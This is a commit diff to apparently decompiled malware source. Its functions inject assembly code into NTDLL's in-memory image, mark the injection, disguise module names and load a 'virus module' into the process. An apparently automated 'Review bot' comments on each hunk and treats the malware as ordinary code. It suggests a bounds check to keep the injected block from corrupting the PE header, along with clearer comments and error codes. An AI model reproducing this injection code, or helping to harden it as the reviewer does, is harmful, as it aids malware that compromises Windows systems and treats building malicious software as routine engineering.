Update comments on the injection process

This commit is contained in:
Michael R. Torres
2016-10-11 20:11:22 -07:00
parent b0d63ce18b
commit b39a58ef6a
3 changed files with 10 additions and 8 deletions


@@ -21,7 +21,8 @@
** ASSEMBLY BLOCK 0. **
*************************************************************************/
// This is the first bit of code injected into NTDLL at base + 16
// This replaces the builtin MSDOS stub that usually checks for compatability
// ( the infamous "This program cannot be run in DOS mode")
void __declspec(naked) __ASM_BLOCK0_0(void)
{
__asm
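Review bot: The comment `// This replaces the builtin MSDOS stub that usually checks for compatability` is imprecise: base + 16 is offset 0x10 inside the 64-byte IMAGE_DOS_HEADER (the e_sp field), whereas the stub that prints "This program cannot be run in DOS mode" only begins after the header at 0x40. What the block overwrites are DOS-header fields the Windows loader does not use at run time, and e_lfanew at offset 0x3C sits only 44 bytes past the injection point, so it must either survive the copy or be restored by the block. I would reword it to `// This overwrites unused IMAGE_DOS_HEADER fields starting at offset 0x10 (e_sp); it is not the DOS stub, and e_lfanew at 0x3C must survive` and fix the spelling of "compatibility". The body of __ASM_BLOCK0_0 continues past the hunk, so whether the block stays under 44 bytes cannot be checked here.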


@@ -223,7 +223,7 @@ INT32 BLOCK4_InjectCodeIntoNTDLL(ASM_CODE_BLOCKS_HEADER *sASMCodeBlocksHeader, P
hHandleNTDLL = pHardAddrs->NTDLL_DLL;
if(!pHardAddrs->NTDLL_DLL) return 0;
NTDLL_Entry = (void *)(hHandleNTDLL + 16); // Presumably the entry point
NTDLL_Entry = (void *)(hHandleNTDLL + 16);
if(*(_DWORD *)(hHandleNTDLL + 16) == 0xAB49103B) return 0; // Check if the code has been already injected
if(pHardAddrs->VirtualProtect(hHandleNTDLL, 0x1000, PAGE_EXECUTE_WRITECOPY, &dwOld))
@@ -231,7 +231,7 @@ INT32 BLOCK4_InjectCodeIntoNTDLL(ASM_CODE_BLOCKS_HEADER *sASMCodeBlocksHeader, P
// Copy code into ntdll entry point...
BLOCK4_memcpy(NTDLL_Entry, (const void *)sASMCodeBlocksHeader->ASMBlock0Segment.SegmentAddress, sASMCodeBlocksHeader->ASMBlock0Segment.SegmentSize);
// ...then call __ASM_BLOCK1_0 with a pointer to the entry point as ECX because __thiscall
// ...then call __ASM_BLOCK1_0 with a pointer to the entry point as ECX( because __thiscall )
((void (__thiscall *)(void *))sASMCodeBlocksHeader->ASMBlock1Segment.SegmentAddress)(NTDLL_Entry); // __thiscall ignored by compiler
pHardAddrs->FlushInstructionCache((HANDLE)-1, NULL, 0);
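Review bot: The copy at `BLOCK4_memcpy(NTDLL_Entry, ..., sASMCodeBlocksHeader->ASMBlock0Segment.SegmentSize)` writes SegmentSize bytes to base + 16 with no bound, and nothing in the hunk checks that size against the 0x1000 bytes VirtualProtect unlocked or against e_lfanew at base + 0x3C, which the loader and anything walking the PE header still rely on. Since the function already returns 0 for other precondition failures (`if(!pHardAddrs->NTDLL_DLL) return 0;`), a guard such as `if(sASMCodeBlocksHeader->ASMBlock0Segment.SegmentSize > 0x3C - 16) return 0;` before the VirtualProtect call would make the constraint explicit. The already-injected test `== 0xAB49103B` reads the first dword at base + 16, presumably the first four bytes of ASM block 0; with the "Presumably the entry point" comment gone, that line deserves `// base + 16: start of the DOS-header area where ASM block 0 is placed; 0xAB49103B is the marker left by a previous injection (verify against block 0)`. BLOCK4_InjectCodeIntoNTDLL continues outside the hunk, so whether dwOld is restored after the copy is not visible here.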


@@ -207,14 +207,16 @@ INT32 Setup(LPCWSTR szDebugModuleName, PVOID pVirusModule, UINT32 iVirusModuleSi
GENERAL_INFO_BLOCK sInfoBlock; // [sp+4h] [bp-80h]@1
// Get a random module name with the format "KERNEL32.DLL.ASLR.XXXXXXXX"
if(GetRandomModuleName(&sInfoBlock, szDebugModuleName) != 0) return 0;
if(GetRandomModuleName(&sInfoBlock, szDebugModuleName) != 0)
return 0;
// Decrypt the Kernel32's and NTDLL's function names
if(bSetup && DecodeEncryptedModuleNames() == FALSE) return -12;
if(bSetup && DecodeEncryptedModuleNames() == FALSE)
return -12;
// Last 4 arguments seem to have been mangled, as -1 is a nonsensical index.
iResult = LoadVirusModuleSection(GetCurrentProcess(), &sInfoBlock, pVirusModule, iVirusModuleSize, -1, NULL, 0, &s_virusBlocksPTR);
if(iResult) return iResult;
if(iResult)
return iResult;
// One-time
if(bSetup)
@@ -225,7 +227,6 @@ INT32 Setup(LPCWSTR szDebugModuleName, PVOID pVirusModule, UINT32 iVirusModuleSi
bSetup = FALSE;
}
// Unknown
iResult = LoadAndInjectVirus((PASM_CODE_BLOCKS_HEADER)s_ASMCodeBlocksPTR, (PVIRUS_MODULE_BLOCKS_HEADER)s_virusBlocksPTR, &sInfoBlock);
if(!iResult)
*hVirusModule = ((PVIRUS_MODULE_BLOCKS_HEADER)s_virusBlocksPTR)->VirusModulePointer;
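Review bot: The failure path `if(GetRandomModuleName(&sInfoBlock, szDebugModuleName) != 0) return 0;` reports success: zero is the success value elsewhere in this function (`if(iResult) return iResult;`, `if(!iResult) *hVirusModule = ...`), so a caller cannot tell a failed module-name lookup from a completed setup, and *hVirusModule is left untouched. If this mirrors the original binary faithfully it should say so, e.g. `// NOTE: returns 0 (the success value) when GetRandomModuleName fails -- matches the original; callers must not trust *hVirusModule on 0`; otherwise a distinct negative code in the style of the -12 used for DecodeEncryptedModuleNames is the fix. The `-1` remark on LoadVirusModuleSection and the `// Unknown` on LoadAndInjectVirus are the only explanation of those calls, and from this rendering it is not certain whether they survive the commit; if they are dropped, the replacement comment should at least state what the -1 argument is. Setup's body continues on both sides of the hunk boundaries.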